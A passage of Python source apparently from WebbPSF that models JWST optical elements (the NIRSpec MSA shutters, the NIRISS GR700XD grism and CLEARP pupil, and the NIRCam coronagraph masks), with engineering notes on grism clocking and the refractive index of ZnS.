strutpaths = [] for segname, vertices in self.segdata: segpaths[segname] = matplotlib.path.Path(vertices) for strutname, vertices in self.strutdata: strutpaths.append(matplotlib.path.Path(vertices)) y, x = wave.coordinates() pts = np.asarray([a for a in zip(x.flat, y.flat)]) npix = wave.shape[0] out = np.zeros((npix, npix)) # paint the segments 1 but leave out the SMSS struts for segname, p in segpaths.items(): res = p.contains_points(pts) res.shape = (npix, npix) out[res] = 1 if not self.label_segments else int(segname.split('-')[1]) for p in strutpaths: res = p.contains_points(pts) res.shape = (npix, npix) out[res] = 0 return out # Note - the following is **NOT USED YET ** # This will be finished up and used in a subsequent release to # apply the OTE field dependence. For now just the fixed per SI stuff # is there. class WebbOTEPupil(poppy.FITSOpticalElement): """The complex OTE pupil, including: 1) the aperture geometry, based on the cryo ICD detailed coordinates 2) high spatial frequency WFE from the as-built mirrors in Rev G optical model 3) mid frequencies from Rev W optical budget 4) low frequency field-dependent WFE from the Rev G optical model. Parameters ----------- level : ' """ def __init__(self, instrument=None, level='requirements', opd_index=0, **kwargs): if instrument is not None: self.instrument = instrument self.instr_name = instrument.name self.tel_coords = instrument._tel_coords() else: self.instrument = None self.instr_name = "NIRCam" # TODO figure out default V2V3 coords here self.tel_coords = (0, 0) # ? TODO # determine filename for pupil amplitude array aperture_file = 'jwst_pupil_revW_npix1024.fits.gz' aperture_file = os.path.abspath(os.path.join( utils.get_webbpsf_data_path(), aperture_file )) # determine filename for the OPD array # This should contain a precomputed combination of # Rev G high spatial frequencies and # Rev W mid spatial frequencies # Depends on what the 'level' parameter is. if level == 'perfect': opd_file = os.path.join( utils.get_webbpsf_data_path(), 'OPD_jwst_ote_perfectly_aligned.fits' ) elif level in ('predicted', 'requirements'): opd_file = os.path.join( utils.get_webbpsf_data_path(), self.instr_name, 'OPD', 'OPD_RevW_ote_for_{}_{}.fits'.format(self.instr_name, level) ) else: raise ValueError("Invalid/unknown wavefront error level") super(WebbOTEPupil, self).__init__(name='JWST Primary', transmission=aperture_file, opd=opd_file, **kwargs) if self.instrument is not None: # we need a field point to be able to use this so # just skip it if we don't have one. # determine Zernike coeffs for field dependent error # based on Rev G field dependence model. coeffs = np.zeros(22) self.zernike_coeffs = coeffs # TODO apply that to as a modification to the OPD array. ####### Custom Optics used in JWInstrument classes ##### class NIRSpec_three_MSA_shutters(poppy.AnalyticOpticalElement): """ Three NIRSpec MSA shutters, adjacent vertically.""" def get_transmission(self, wave): """ Compute the transmission inside/outside of the field stop. The area of an open shutter is 0.2 x 0.45, while the shutter pitch is 0.26x0.51 The walls separating adjacent shutters are 0.06 arcsec wide. """ msa_width = 0.2 msa_height = 0.45 msa_wall = 0.06 if not isinstance(wave, poppy.Wavefront): raise ValueError("get_transmission must be called with a Wavefront to define the spacing") assert (wave.planetype == poppy.poppy_core._IMAGE) y, x = wave.coordinates() self.transmission = np.zeros(wave.shape) # get the innermost shutter than spans the Y axis w_inside_1 = np.where((abs(y) < (msa_height / 2)) & (abs(x) < (msa_width / 2))) self.transmission[w_inside_1] = 1 # get the adjacent shutters one above and one below. w_inside_2 = np.where((abs(y) > (msa_height / 2) + msa_wall) & (abs(y) < msa_height * 1.5 + msa_wall) & (abs(x) < (msa_width / 2))) self.transmission[w_inside_2] = 1 return self.transmission class NIRSpec_MSA_open_grid(poppy.AnalyticOpticalElement): """ An infinite repeating region of the NIRSpec MSA grid""" def get_transmission(self, wave): """ Compute the transmission inside/outside of the field stop. The area of an open shutter is 0.2 x 0.45, while the shutter pitch is 0.26x0.51 The walls separating adjacent shutters are 0.06 arcsec wide. """ msa_width = 0.2 msa_height = 0.45 msa_wall = 0.06 msa_x_pitch = 0.26 msa_y_pitch = 0.51 if not isinstance(wave, poppy.Wavefront): raise ValueError("get_transmission must be called with a Wavefront to define the spacing") assert (wave.planetype == poppy.poppy_core._IMAGE) y, x = wave.coordinates() # xnew = x*np.cos(np.deg2rad(self.angle)) + y*np.sin(np.deg2rad(self.angle)) # ynew = -x*np.sin(np.deg2rad(self.angle)) + y*np.cos(np.deg2rad(self.angle)) # x,y = xnew, ynew mask_vert_walls = np.abs(np.mod(np.abs(x), msa_x_pitch) - (msa_x_pitch / 2)) < msa_wall / 2 mask_horz_walls = np.abs(np.mod(np.abs(y), msa_y_pitch) - (msa_y_pitch / 2)) < msa_wall / 2 self.transmission = np.ones(wave.shape) self.transmission[mask_vert_walls] = 0 self.transmission[mask_horz_walls] = 0 return self.transmission class NIRISS_GR700XD_Grism(poppy.AnalyticOpticalElement): """ Custom optic class to model the NIRISS SOSS grim GR700XD This includes both the pupil mask file and the cylindrical lens Based on inputs from Loic Albert, Anand Sivaramakrishnan, and Andre Martel In particular see FGS_TFI_UdM_035_RevD for details of the NIRISS GR700XD measurement, and JWST-STScI-003338 for detector orientation and layout. GRISM DESIGN: The grism (and cylinder) are per design rotated by 2 degrees so as to be able to sample an emission line across different pixel position along the spatial direction (kind of resampling the line and not be limited by intra pixel response). From Loic Albert's NIRISS technical report: * surface sag for the cylinder: 3.994 micron peak * limited to 3.968 microns for the 26 mm FOV mask From Loic Albert's email to Marshall 2013-07-18: I do have an update concerning the geometry of the GR700XD pupil mask. It turns out that they clocked the grism by about 2.25 degrees wrt the OTE system of coordinates. However, the field mask did not follow and is still aligned along the OTE s.o.c. That was a mistake that fortunately does have much impact. Comdev is in the process of modelling a new mask for the Spare grism. Remember that we will swap the current FLight GR700XD for its Spare which offers much improved performances. The mask size will be a little different (rectangular) and this time will be clocked 2.25 degrees along with the grism. The sign of the rotation of the grism will have to be devised by trying the 2 possibilities an looking at the resulting tilt of the monochromatic PSF and the position of that PSF on the detector. Attached is a simulation of what we expect based on my own PSF generator. The cylinder lens has a well characterized power (actually radius of curvature). The values are: current Flight: 22.85 meters Spare: 22.39 meters Prism physical size: pupil is 26 mm on a side for the current prism, will be 28 mm for the spare From Loic Albert's email to Marshall 2013-09-19: The latest news on this front are: 1 - The current Flight mask is attached. It is 26x26 mm. The mask and grism are *not* aligned along the same coordinates. That was a mistake. I'll forward you a message from Michael M., our optics expert at CSA. 2 - The Spare mask (likely the one which will fly) is not built yet. The mask will be aligned along the grism coordinate and both will be clocked 2.2 deg wrt the OTE. 3 - A ghost analysis showed that the current grism clocking will suffer from large ghosts. So we are studying how to clock the Spare grism in its cell to minimize ghosts. Likely a 90 degrees rotation will be applied to baseline of point 2. From Michael.Maszkiewicz@asc-csa.gc.ca: As far as I understand now, we have two rotations in the as-built GR700. One rotation is for the prism-grism combo by 2 deg CCW, looking along the local +z axis, and the second rotation is for the mask by 3.05 deg but CW. As a result there is total 5.05 deg rotation between grism and its mask. See my annotations to your drawing attached. From Loic Albert's email to Marshall 2014-05-20: I should have pointed that the power assumed in my simulations for the cylindrical lens was off. It was one of the conclusions of CV1RR. The actual radius of curvature of the cylinder is 25.3 meters (rather than the smaller figure I used before). ORIENTATION: See Figure 2 of JWST-STScI-003338 In "DMS" coordinates, as projected looking outwards onto the sky, The GR700XD grating trace is near the extreme right edge of the detector with long wavelengths closest to (2048,2048) and short wavelengths nearest (2048,0) (The raw detector coordinates are very different from this due to a 180 degree rotation) **PLEASE NOTE** that the DMS when processing spectral data performs an additional transformation: For spectral data, the science X-axis is aligned with the detector dispersion direction and the science frame Y-axis is at a right angle to the X-axis in a right-handed coordinate system (Swade 2003) We choose here to ignore that complication; WebbPSF simulates the 2D sky projected image in "Sci" coordinates in the terminology for SIAF from Lallo et al. In this coordinate system, the dispersion from the cylinder lens is aligned almost along V2 and the longer wavelengths are oriented toward +V3. Parameters ---------- which : string 'initial' or 'spare'. Properties are hard coded. """ # # transmission : string filename # file for the pupil transmission function # cylinder_sag_mm : float # physical thickness of the cylindrical lens, in millimeters # rotation_angle : float # degrees clockwise for the orientation of the cylinder's dispersing axis. Default # of 92.25 should be consistent with initial NIRISS girsm and spare, except for # sign ambiguity. # rotate_mask : bool # should the field mask be rotated along with the cylinder? False for first gen initial # prism, true for expected spare replacement. def __init__(self, name='GR700XD', which='Bach', # cylinder_radius=22.85, cylinder_sag_mm=4.0, rotation_angle=92.25, rotate_mask=False, transmission=None, **kwargs): # Initialize the base optical element with the pupil transmission and zero OPD if which == 'LLNL': raise NotImplementedError("Rotated field mask for LLNL grism not yet implemented!") elif which == 'Bach': transmission = os.path.join(utils.get_webbpsf_data_path(), "NIRISS/optics/MASKGR700XD.fits.gz") else: raise NotImplementedError("Unknown grating name:" + which) poppy.AnalyticOpticalElement.__init__(self, name=name, planetype=poppy.poppy_core._PUPIL, **kwargs) # UPDATED NUMBERS 2013-07: # See Document FGS_TFI_UdM_035_RevD _log.debug("Computing properties for {0} grism".format(which)) if which == 'Bach': # ---- Phase properties --------------- # 3.994 microns P-V over 27.02 mm measured (Loic's email) # This is **surface sag**, corresponding to P-V of 6.311 waves at lambda=632.8 nm. # should correspond to 3.698 microns over 26 mm clear aperture. self.prism_size = 0.02702 # 27.02 millimeters for the physical prism self.prism_clear_aperture = 0.0260 # 26 mm clear aperture for the prism + mount self.cylinder_rotation_angle = 2 # was 2.25 # self.cylinder_radius = 22.85 # radius of curvature ; Nominal # but they discarded that and used 25.3 instead # From Lafreniere's wfe_cylindricallens.pro: # "OVERRIDE PREVIOUS CASES AFTER CV1RR RESULTS:" self.cylinder_radius = 25.3 # radius of curvature # ---- Amplitude Transmission / Pupil shape --------------- self.pupil_size_mm = 26.0 # Note that the IDL code says 26 mm is 683.75 pixels using the assumed demagnification self.pupil_rotation_angle = 2.0 else: # 5.8 microns P-V over 32.15 mm (Loic's email) # should correspond to 4.38 microns over 28 mm clear aperture self.cylinder_radius = 22.39 # radius of curvature self.prism_size = 0.03215 # millimeters for the physical prism self.prism_clear_aperture = 0.0280 # clear aperture for the prism + mount self.cylinder_rotation_angle = 2.25 # We need to know the magnification scale of the NIRISS reimaged pupil # in order to compute the curvature in the full-pupil units that POPPY uses # internally # pupil magnification computed from 22 mm clear aperture reported = # 857-169 pixels = 699 pixels in the 2D array which has scale =.00645604 # = 4.44175 meters projected on the primary # 2014-05-21 but wait, that's actually 26 mm! # so the 699 pixels at 0.00645604 m/pixel = 4.512 meters implies the magnificationa 173 not 170 # but, double wait, it's actually more like 687 pixels across rather than 699 so that makes it 170 again. # therefore the magnification is 0.1708 meters projected on the primary / mm in the NIRISS pupil # self.pupil_demagnification = 170.8367 # meters on the primary / meters in the NIRISS pupil # self.pupil_demagnification = 173.56 # meters on the primary / meters in the NIRISS pupil # Anand says: # nominally the circumscribing circle at the PW of NIRISS is ~40mm. I use 39mm for the nrm, but it's slightly field-dependent. Compare that to the 6.6... PM circle? self.pupil_demagnification = 6.6 / 0.040 # about 165 # perform an initial population of the OPD array for display etc. tmp = self.get_phasor(poppy.Wavefront(2e-6)) def get_opd(self, wave): """ Make an OPD array corresponding to the cylindrical weak lens used for defocusing the spectrum in the perpendicular-to-dispersion direction. Parameters ---------- wave : float or obj either a scalar wavelength (meters) or a Wavefront object """ # wave should be a Wavefront object # wavelength is an astropy.units type if isinstance(wave, poppy.Wavefront): wavelength = wave.wavelength else: wave = poppy.Wavefront(wavelength=float(wave)) wavelength = wave.wavelength # compute indices in pixels, relative to center of plane, with rotation # units of these are meters y, x = wave.coordinates() ang = np.deg2rad(self.cylinder_rotation_angle) x = np.cos(ang) * x - np.sin(ang) * y y = np.sin(ang) * x + np.cos(ang) * y _log.debug(" Rotating local grism axes by {0} degrees".format(self.cylinder_rotation_angle)) # From IDL code by David Lafreniere: # ;the cylindrical defocus # x=(dindgen(pupdim)-pupdim/2)#replicate(1,pupdim) # y0=(rpuppix^2+sag[s]^2)/(2*sag[s]) # wfe1=y0-sqrt(y0^2-x^2) # if sag[s] lt 1.e-5 then wfe1=0.d0 # Here I will just translate that to Python exactly, making use of the # variables here: # rpuppix = radius of pupil in pixels # rpuppix = self.amplitude_header['DIAM'] / self.amplitude_header['PUPLSCAL'] / 2 # Calculate the radius of curvature of the cylinder, bsaed on # the chord length and height # In this case we're assuming the cylinder is precisely as wide as the projected # telescope pupil. This doesn't seem guaranteed: # * actual chord length across cylinder: 27.02 mm. # * projected primary scale at NIRISS = ? _log.debug(" Computing GR700XD cylinder based on RoC: {0:.3g} meters".format(self.cylinder_radius)) _log.debug( " Computing GR700XD cylinder based on pupil demagnification: {0:.3g} primary to grism".format(self.pupil_demagnification)) # Compute the overall sag of the cylinder lens at its outer edge. This is not actually used, it's # just for cross-check of the values # the sag will depend on half the pupil size since that's the offset from center to edge sag0 = np.sqrt(self.cylinder_radius ** 2 - (self.prism_size / 2) ** 2) - self.cylinder_radius _log.debug(" Computed GR700XD cylinder sag at lens outer edge (for cross check only): {0:.3g} meters".format(sag0)) # now compute the spatially dependent sag of the cylinder, as projected onto the primary # what is the pupil scale at the *reimaged pupil* of the grism? pupil_scale_m_per_pix = 38.0255e-6 # Based on UdeM info in wfe_cylindricallens.pro # sag = np.sqrt(self.cylinder_radius**2 - (x*self.amplitude_header['PUPLSCAL']/self.pupil_demagnification)**2) - self.cylinder_radius sag = np.sqrt(self.cylinder_radius ** 2 - (x / self.pupil_demagnification) ** 2) - self.cylinder_radius # sag = self.cylinder_radius - np.sqrt(self.cylinder_radius**2 - (x * pupil_scale_m_per_pix )**2 ) # what we really want to do is take the physical properties of the as-built optic, and interpolate into that # to compute the OPD after remapping based on the pupil scale (and distortion?) # y0=(rpuppix**2+self.cylinder_sag**2)/(2*self.cylinder_sag) # wfe1=y0-np.sqrt(y0**2-x**2) _log.debug(" Cylinder P-V: {0:.4g} meters physical sag across full array".format(sag.max() - sag.min())) # no OPD in opaque regions (makes no difference in propagation but improves display) if self._transmission.shape != sag.shape: tmp = self.get_transmission() # Update the ._transmission attribute sag[self._transmission == 0] = 0 wnz = np.where(self._transmission != 0) # use this just for display of the log messages: _log.debug(" Cylinder P-V: {0:.4g} meters physical sag across clear aperture".format(sag[wnz].max() - sag[wnz].min())) # scale for index of refraction index = self.ZnS_index(wavelength) opd = sag * (index - 1) lambda_micron = wavelength.to(units.micron).value _log.debug(" Scaling for ZnS index of refraction {0} at {1:.3g} microns".format(index, lambda_micron)) _log.debug( " Cylinder P-V: {0:.4g} meters optical sag at {1:.3g} microns across clear aperture".format(opd[wnz].max() - opd[wnz].min(), lambda_micron)) return opd def get_transmission(self, wave): """ Make array for the pupil obscuration appropriate to the grism """ if isinstance(wave, poppy.Wavefront): wavelength = wave.wavelength else: wave = poppy.Wavefront(wavelength=float(wave)) wavelength = wave.wavelength y, x = wave.coordinates() ang = np.deg2rad(self.pupil_rotation_angle) x = np.cos(ang) * x - np.sin(ang) * y y = np.sin(ang) * x + np.cos(ang) * y _log.debug("Rotating local pupil mask axes by {0} degrees".format(self.cylinder_rotation_angle)) pupil_halfsize_m = self.pupil_size_mm / 2 / 1000 * self.pupil_demagnification pupilmask = np.ones_like(x) pupilmask[np.abs(x) > pupil_halfsize_m] = 0 pupilmask[np.abs(y) > pupil_halfsize_m] = 0 self._transmission = pupilmask return pupilmask @poppy.utils.quantity_input(wavelength=units.meter) def ZnS_index(self, wavelength, temperature=40): """ Return cryogenic index of refraction of ZnS (Cleartran) Based on IDL function index_cleartran provided by Loic Albert at U de Montreal Which was in turn based on Leviton and Fray 2013 http://proceedings.spiedigitallibrary.org/proceeding.aspx?articleid=1744938 doi:10.1117/12.2024817 """ lambda_micron = wavelength.to(units.micron).value # Sellmeier dispersion model # From Leviton & Frey measurements (SPIE preprint) (assumes lambda in microns) S_1 = np.asarray([[3.35933, -5.12262e-4, 1.01086e-5, -4.14798e-8, 6.91051e-11]]) S_2 = np.asarray([[0.706131, 4.89603e-4, -8.91159e-6, 3.81621e-8, -6.54805e-11]]) S_3 = np.asarray([[4.02154, -2.93193e-2, 2.31080e-4, -7.57289e-07, 8.31188e-10]]) S_ij = np.concatenate((S_1, S_2, S_3), axis=0) lambda_1 = np.array([[0.161151, -8.93057E-06, 2.73286E-07, -1.23408E-09, 2.29917E-12]]) lambda_2 = np.array([[0.282427, -4.66636E-05, 7.55906E-07, -2.77513E-09, 4.35237E-12]]) lambda_3 = np.array([[41.1590, -0.161010, 1.23906E-03, -3.95895E-06, 4.16370E-09]]) lambda_ij = np.concatenate((lambda_1, lambda_2, lambda_3)) n2minus1 = 0.0 T = temperature for i in range(3): S_i = S_ij[i, 0] + S_ij[i, 1] * T + S_ij[i, 2] * T ** 2.0 + S_ij[i, 3] * T ** 3.0 + S_ij[i, 4] * T ** 4.0 lambda_i = lambda_ij[i, 0] + lambda_ij[i, 1] * T + lambda_ij[i, 2] * T ** 2.0 + lambda_ij[i, 3] * T ** 3.0 + lambda_ij[ i, 4] * T ** 4.0 n2minus1 += S_i * lambda_micron ** 2.0 / (lambda_micron ** 2.0 - lambda_i ** 2.0) cleartran_index = np.sqrt(1.0 + n2minus1) return cleartran_index def display(self, opd_vmax=6e-6, *args, **kwargs): "Same as regular display for any other optical element, except opd_vmax default changed" poppy.AnalyticOpticalElement.display(self, *args, opd_vmax=opd_vmax, **kwargs) class NIRISS_CLEARP(poppy.CompoundAnalyticOptic): """NIRISS 'CLEARP' pupil, including PAR obscuration **CAUTIONARY NOTE** TODO: This class represents this optic as having a circular outer edge; in reality the hardware has a 4% oversized tricontagon mask around the JWST pupil image. However as the primary mirror should serve as the pupil stop, in practice this model simplification should not affect output PSFs in imaging modes. This simplification may be removed in a future version of WebbPSF. See https://github.com/mperrin/webbpsf/issues/71 CLEARP pupil info from: MODIFIED CALIBRATION OPTIC HOLDER - NIRISS DRAWING NO 196847 REV 0 COMDEV Design file name 196847Rev0.pdf sent by Loic Albert Properties: 39 mm outer diam, corresponds to the circumscribing pupil of JWST 2.0 mm vane width 6.0 mm radius for central obstruction Note the circumscribing pupil of JWST is 6603.464 mm in diameter (Ball SER on geometric optics model: BALL-JWST-SYST-05-003) and therefore the NIRISS pupil magnification is 6.603464/39.0 = 0.1693 meters (JWST primary) per mm (NIRISS internal pupil) Pupil distortions are not included in this model. """ def __init__(self, *args, **kwargs): # CLEARP pupil info from: # MODIFIED CALIBRATION OPTIC HOLDER - NIRISS # DRAWING NO 196847 REV 0 COMDEV # Design file name 196847Rev0.pdf sent by Loic Albert # Properties: # 39 mm outer diam, corresponds to the circumscribing pupil of JWST # 2.0 mm vane width # 6.0 mm radius for central obstruction # Note the circumscribing pupil of JWST is 6603.464 mm in diameter # (Ball SER on geometric optics model: BALL-JWST-SYST-05-003) pupil_mag = 6.603464 / 39.0 poppy.CompoundAnalyticOptic.__init__(self, ( poppy.SecondaryObscuration(secondary_radius=6.0 * pupil_mag, support_width=2.0 * pupil_mag, n_supports=3, support_angle_offset=90 + 180, # align first support with +V2 axis # but invert to match OTE exit pupil *args, **kwargs), poppy.CircularAperture(radius=39 * pupil_mag / 2, *args, **kwargs)), name='CLEARP') class NIRCam_BandLimitedCoron(poppy.BandLimitedCoron): """ Band Limited Coronagraph Paramaters ---------- name : string Descriptive name. Must be one of the defined NIRCam coronagraphic mask names. module : string A or B nd_squares : bool Include the ND squares in the mask simulation? (Not an option in the real instrument; solely for certain simulation checks.) bar_offset : float Offset along coronagraphic bar (wedge) occulter, in arcseconds. Used for computing a PSF at a different position along the wedge, while keeping the convention that the target star has zero tip/tilt. This option is used to MANUALLY specify a specific position along the bar; see also the following option auto_offset. auto_offset : string or None Set to a NIRCam filter name to automatically offset to the nominal position along the bar for that filter. See bar_offset if you want to set to some arbitrary position. shift_x, shift_y : floats or None X and Y offset shifts applied to the occulter, via the standard mechanism for poppy.AnalyticOpticalElements. Like bar_offset but allows for 2D offets, and applies to both bar and wedge coronagraphs. This is IN ADDITION TO any offset from bar_offset. """ allowable_kinds = ['nircamcircular', 'nircamwedge'] """ Allowable types of BLC supported by this class""" def __init__(self, name="unnamed BLC", kind='nircamcircular', module='A', nd_squares=True, bar_offset=None, auto_offset=None, **kwargs): super(NIRCam_BandLimitedCoron, self).__init__(name=name, kind=kind, **kwargs) if module not in ['A', 'B']: raise ValueError("module parameter must be 'A' or 'B'.") self.module = module self.nd_squares = nd_squares if self.name == 'MASK210R': self.sigma = 5.253 self.kind = 'nircamcircular' elif self.name == 'MASK335R': self.sigma = 3.2927866 self.kind = 'nircamcircular' elif self.name == 'MASK430R': self.sigma = 2.58832 self.kind = 'nircamcircular' elif self.name == 'MASKSWB': self.kind = 'nircamwedge' # coeffs set in lookup table inside getPhasor elif self.name == 'MASKLWB': self.kind = 'nircamwedge' # coeffs set in lookup table inside getPhasor else: raise NotImplementedError("invalid name for NIRCam occulter: " + self.name) # EDIT: updated on 8 Dec 2021 to grab offsets directly from pySIAF self.siaf = pysiaf.Siaf('NIRCAM') self.offset_swb = {filt: self.get_bar_offset_from_siaf(filt, channel='SW') for filt in ["F182M", "F187N", "F210M", "F212N", "F200W", 'narrow']} self.offset_lwb = {filt: self.get_bar_offset_from_siaf(filt, channel='LW') for filt in ["F250M", "F300M", "F277W", "F335M", "F360M", "F356W", "F410M", "F430M", "F460M", "F480M", "F444W", 'narrow']} if bar_offset is None and auto_offset is not None: offsets = self.offset_swb if self.name.lower() == 'maskswb' else self.offset_lwb try: bar_offset = offsets[auto_offset] _log.debug("Set bar offset to {} based on requested filter {} on {}.".format(bar_offset, auto_offset, self.name)) except: raise ValueError("Filter {} does not have a defined nominal offset position along {}".format(auto_offset, self.name)) if bar_offset is not None: if self.kind == 'nircamcircular': raise ValueError("bar_offset option only makes sense with the bar occulters.") self.bar_offset = float(bar_offset) _log.debug("Set offset along {} to {} arcsec.".format(self.name, self.bar_offset)) else: self.bar_offset = None def get_bar_offset_from_siaf(self, filt, channel='LW'): """ Get bar offset directly from SIAF. """ if channel == 'SW': refapername = 'NRCA4_MASKSWB' apername = 'NRCA4_MASKSWB_' + filt.upper() else: # otherwise default to LW refapername = 'NRCA5_MASKLWB' apername = 'NRCA5_MASKLWB_' + filt.upper() offset_arcsec = np.sqrt((self.siaf.apertures[refapername].V2Ref - self.siaf.apertures[apername].V2Ref)**2 + (self.siaf.apertures[refapername].V3Ref - self.siaf.apertures[apername].V3Ref)**2) sign = np.sign(self.siaf.apertures[refapername].V2Ref - self.siaf.apertures[apername].V2Ref) return sign * offset_arcsec def get_transmission(self, wave): """ Compute the amplitude transmission appropriate for a BLC for some given pixel spacing corresponding to the supplied Wavefront. Based on the Krist et al. SPIE paper on NIRCam coronagraph design Note that the equations in Krist et al specify the intensity transmission of the occulter, but what we want to return here is the amplitude transmittance. That is the square root of the intensity, of course, so the equations as implemented here all differ from those written in Krist's SPIE paper by lacking an exponential factor of 2. Thanks to John Krist for pointing this out. """ import scipy.special if not isinstance(wave, poppy.Wavefront): # pragma: no cover raise ValueError("BLC getPhasor must be called with a Wavefront to define the spacing") assert (wave.planetype == poppy.poppy_core._IMAGE) y, x = self.get_coordinates(wave) if self.bar_offset is not None: x += float(self.bar_offset) if self.kind == 'nircamcircular': r = poppy.accel_math._r(x, y) sigmar = self.sigma * r # clip sigma: The minimum is to avoid divide by zero # the maximum truncates after the first sidelobe to match the hardware bessel_j1_zero2 = scipy.special.jn_zeros(1, 2)[1] sigmar.clip(np.finfo(sigmar.dtype).tiny, bessel_j1_zero2, out=sigmar) # avoid divide by zero -> NaNs if poppy.accel_math._USE_NUMEXPR: import numexpr as ne jn1 = scipy.special.j1(sigmar) self.transmission = ne.evaluate("(1 - (2 * jn1 / sigmar) ** 2)") else: self.transmission = (1 - (2 * scipy.special.j1(sigmar) / sigmar) ** 2) self.transmission[r == 0] = 0 # special case center point (value based on L'Hopital's rule) elif self.kind == 'nircamwedge': # This is hard-coded to the wedge-plus-flat-regions shape for NIRCAM # the scale fact should depend on X coord in arcsec, scaling across a 20 arcsec FOV. # map flat regions to 2.5 arcsec each # map -7.5 to 2, +7.5 to 6. slope is 4/15, offset is +9.5 wedgesign = 1 if self.name == 'MASKSWB' else -1 # wide ends opposite for SW and LW scalefact = (2 + (x * wedgesign + 7.5) * 4 / 15).clip(2, 6) # Working out the sigma parameter vs. wavelength to get that wedge pattern is non trivial # This is NOT a linear relationship. See calc_blc_wedge helper fn below. if self.name == 'MASKSWB': # np.abs(self.wavelength - 2.1e-6) < 0.1e-6: polyfitcoeffs = np.array([2.01210737e-04, -7.18758337e-03, 1.12381516e-01, -1.00877701e+00, 5.72538509e+00, -2.12943497e+01, 5.18745152e+01, -7.97815606e+01, 7.02728734e+01]) elif self.name == 'MASKLWB': # elif np.abs(self.wavelength - 4.6e-6) < 0.1e-6: polyfitcoeffs = np.array([9.16195583e-05, -3.27354831e-03, 5.11960734e-02, -4.59674047e-01, 2.60963397e+00, -9.70881273e+00, 2.36585911e+01, -3.63978587e+01, 3.20703511e+01]) else: raise NotImplementedError("invalid name for NIRCam wedge occulter") sigmas = scipy.poly1d(polyfitcoeffs)(scalefact) sigmar = sigmas * np.abs(y) # clip sigma: The minimum is to avoid divide by zero # the maximum truncates after the first sidelobe to match the hardware sigmar.clip(min=np.finfo(sigmar.dtype).tiny, max=2 * np.pi, out=sigmar) self.transmission = (1 - (np.sin(sigmar) / sigmar) ** 2) self.transmission[y == 0] = 0 # special case center point (value based on L'Hopital's rule) # the bar should truncate at +- 10 arcsec: woutside = np.where(np.abs(x) > 10) self.transmission[woutside] = 1.0 if self.nd_squares: # add in the ND squares. Note the positions are not exactly the same in the two wedges. # See the figures in Krist et al. of how the 6 ND squares are spaced among the 5 # corongraph regions # Note: 180 deg rotation needed relative to Krist's figures for the flight SCI orientation: if ((self.module == 'A' and self.name == 'MASKLWB') or (self.module == 'B' and self.name == 'MASK210R')): # left edge: # has one fully in the corner and one half in the other corner, half outside the 10x10 box wnd_5 = np.where( ((y < -5) & (y > -10)) & ( ((x > 5) & (x < 10)) | ((x < -7.5) & (x > -12.5)) ) ) wnd_2 = np.where( ((y < 10) & (y > 8)) & ( ((x > 8) & (x < 10)) | ((x < -9) & (x > -11)) ) ) elif ((self.module == 'A' and self.name == 'MASK210R') or (self.module == 'B' and self.name == 'MASKSWB')): # right edge wnd_5 = np.where( ((y < -5) & (y > -10)) & ( ((x < 12.5) & (x > 7.5)) | ((x < -5) & (x > -10)) ) ) wnd_2 = np.where( ((y < 10) & (y > 8)) & ( ((x < 11) & (x > 9)) | ((x < -8) & (x > -10)) ) ) else: # the others have two, one in each corner, both halfway out of the 10x10 box. wnd_5 = np.where( ((y < -5) & (y > -10)) & (np.abs(x) > 7.5) & (np.abs(x) < 12.5) ) wnd_2 = np.where( ((y < 10) & (y > 8)) & (np.abs(x) > 9) & (np.abs(x) < 11) ) self.transmission[wnd_5] = np.sqrt(1e-3) self.transmission[wnd_2] = np.sqrt(1e-3) # Add in the opaque border of the coronagraph mask holder. if ((self.module == 'A' and self.name == 'MASKLWB') or (self.module == 'B' and self.name == 'MASK210R')): # left edge woutside = np.where((x > 10) & (y > -11.5)) self.transmission[woutside] = 0.0 elif ((self.module == 'A' and self.name == 'MASK210R') or (self.module == 'B' and self.name == 'MASKSWB')): # right edge woutside = np.where((x < -10) & (y > -11.5)) self.transmission[woutside] = 0.0 # mask holder edge woutside = np.where(y > 10) self.transmission[woutside] = 0.0 # edge of mask itself # TODO the mask edge is complex and partially opaque based on CV3 images? # edge of glass plate rather than opaque mask I believe. To do later. # The following is just a temporary placeholder with no quantitative accuracy. # but this is outside the coronagraph FOV so that's fine - this only would matter in # modeling atypical/nonstandard calibration exposures. wedge = np.where((y < -11.5) & (y > -13)) self.transmission[wedge] = 0.7 if not np.isfinite(self.transmission.sum()): # stop() _log.warn("There are NaNs in the BLC mask - correcting to zero. (DEBUG LATER?)") self.transmission[np.where(np.isfinite(self.transmission) == False)] = 0 return self.transmission def display(self, annotate=False, annotate_color='cyan', annotate_text_color=None, grid_size=20, *args, **kwargs): """Same as regular display for any other optical element, except adds annotate option for the LWB offsets """ poppy.AnalyticOpticalElement.display(self, grid_size=grid_size, *args, **kwargs) if annotate: shift_dx = getattr(self, 'shift_x', 0) - getattr(self, 'bar_offset', 0) shift_dy = getattr(self, 'shift_y', 0) if annotate_text_color is None: annotate_text_color = annotate_color if self.name.lower() == 'maskswb' or self.name.lower() == 'masklwb': offset = self.offset_swb if self.name.lower() == 'maskswb' else self.offset_lwb for filt, offset in offset.items(): if 'W' in filt: horiz, vert, voffset = 'right', 'top', -0.5 else: horiz, vert, voffset = 'left', 'bottom', +0.5 matplotlib.pyplot.plot(offset + shift_dx, shift_dy, marker='+', color=annotate_color, clip_on=True) matplotlib.pyplot.text(offset + shift_dx, voffset + shift_dy, filt, color=annotate_text_color, rotation=75, horizontalalignment=horiz, verticalalignment=vert, clip_on=True) ax = matplotlib.pyplot.gca() # Fix the axis scaling if any of the overplots exceeded it ax.set_xlim(-grid_size / 2, grid_size / 2) ax.set_ylim(-grid_size / 2, grid_size / 2) # Helper functions for NIRcam occulters. # The following are no longer used in practice, but were used to derive the # table of polynomial coefficients that is now hard-coded inside # the NIRCam_BandLimitedCoron case for the nircam wedge occulters. def _width_blc(desired_width, approx=None, plot=False): """ The calculation of sigma parameters for the wedge BLC function is not straightforward. This function numerically solves the relevant equation to determine the sigma required to acheive a given HWHM. It uses recursion to iterate to a higher precision level. """ loc = desired_width if approx is None: sigma = np.linspace(0, 20, 5000) else: sigma = np.linspace(approx * 0.9, approx * 1.1, 100000.) lhs = loc * np.sqrt(1 - np.sqrt(0.5)) rhs = np.sin(sigma * loc) / sigma diff = np.abs(lhs - rhs) wmin = np.where(diff == np.nanmin(diff)) sig_ans = sigma[wmin][0] if approx: return sig_ans else: # use recursion sig_ans = _width_blc(loc, sig_ans) if plot: check = (1 - (np.sin(sig_ans * loc) / sig_ans / loc) ** 2) ** 2 # plt.plot(sigma, lhs) plt.clf() plt.plot(sigma, rhs) plt.axhline(lhs) print("sigma = %f implies HWHM = %f" % (sig_ans, loc)) print(" check: 0.5 == %f" % (check)) 